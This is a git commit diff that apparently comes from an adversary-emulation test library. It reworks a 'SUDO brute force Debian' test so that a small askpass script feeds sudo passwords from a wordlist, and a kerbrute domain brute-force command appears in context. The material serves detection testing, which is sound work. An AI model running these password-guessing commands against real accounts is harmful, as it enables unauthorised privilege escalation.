cleanup 1110.001 4 SUDO brute debian (#2253)

* cleanup 1110.001 4 SUDO brute debian

* Add echo to have success exit status

Co-authored-by: Michael Haag <5632822+MHaggis@users.noreply.github.com>

atomics/T1110.001/T1110.001.yaml

@@ -120,7 +120,10 @@ atomic_tests:
 - name: SUDO brute force Debian
   auto_generated_guid: 464b63e8-bf1f-422e-9e2c-2aa5080b6f9a
   description: |
-    Brute force the password of a local user account which is a member of the sudo'ers group on a Debian based Linux distribution.  
+    Attempts to sudo with current user using passwords from a list.  Will run sudo 3 times, each with 3 different password attempts.
+    PreRequisites : debian,ubuntu,kali and pam_tally NOT configured.
+    If the password list contains the user password in last 9 entries, a sudo will be attempted and will succeed if user is in /etc/sudoers.
+    The /var/log/auth.log will show evidence of "3 incorrect password attempts" or "user NOT in sudoers"
   supported_platforms:
     - linux
   dependency_executor_name: sh
@@ -130,32 +133,18 @@ atomic_tests:
     prereq_command: |
       if grep -iq "debian\|ubuntu\|kali" /usr/lib/os-release; then echo "Debian"; else echo "NOT Debian"; exit 1; fi
       if grep -Rq "pam_tally" /etc/pam.d/*; then echo "pam_tally configured"; exit 1; fi
+      cp PathToAtomicsFolder/T1110.001/src/passwords.txt /tmp/workingfile
+      cp PathToAtomicsFolder/T1110.001/src/asker.sh /tmp/asker && chmod 755 /tmp/asker
       if [ -x "$(command -v sudo)" ]; then echo "sudo installed"; else echo "install sudo"; fi
-      if [ -x "$(command -v openssl)" ]; then echo "openssl installed"; else echo "install openssl"; fi
     get_prereq_command: |
-      apt-get update && apt-get install -y openssl sudo
+      apt-get update && apt-get install -y sudo
   executor:
-    elevation_required: true 
+    elevation_required: false
     command: |
-      useradd -G sudo -s /bin/bash -p $(openssl passwd -1 password) target
-      su target
-
-      PASSWORDS=(one two three password five); \
-          touch /tmp/file; \
-          for P in ${PASSWORDS[@]}; do \
-              date +"%b %d %T"; \
-              sudo -k && echo "$P" |sudo -S whoami &>/tmp/file; \
-              echo "exit: $?"; \
-              if grep -q "root" /tmp/file; then \
-                  echo "FOUND: sudo => $P"; break; \
-              else \
-                  echo "TRIED: $P"; \
-              fi; \
-              sleep 2; \
-          done; \
-          rm /tmp/file
+      for i in 1 2 3 ; do SUDO_ASKPASS=/tmp/asker sudo -k -A whoami && wc -l /tmp/workingfile; done
+      echo done
     cleanup_command: |
-      userdel target
+      rm -f /tmp/asker /tmp/workingfile
     name: sh
 
 - name: SUDO brute force Redhat
@@ -232,4 +221,4 @@ atomic_tests:
     elevation_required: false
     command: |
       cd $env:temp
-      .\kerbrute.exe bruteuser --dc #{domaincontroller} -d #{domain} $env:temp\bruteuser.txt TestUser1 
+      .\kerbrute.exe bruteuser --dc #{domaincontroller} -d #{domain} $env:temp\bruteuser.txt TestUser1 

atomics/T1110.001/src/asker.sh

@@ -0,0 +1,4 @@
+#!/bin/sh
+WORD=`tail -1 /tmp/workingfile`
+sed -i '$d' /tmp/workingfile
+echo $WORD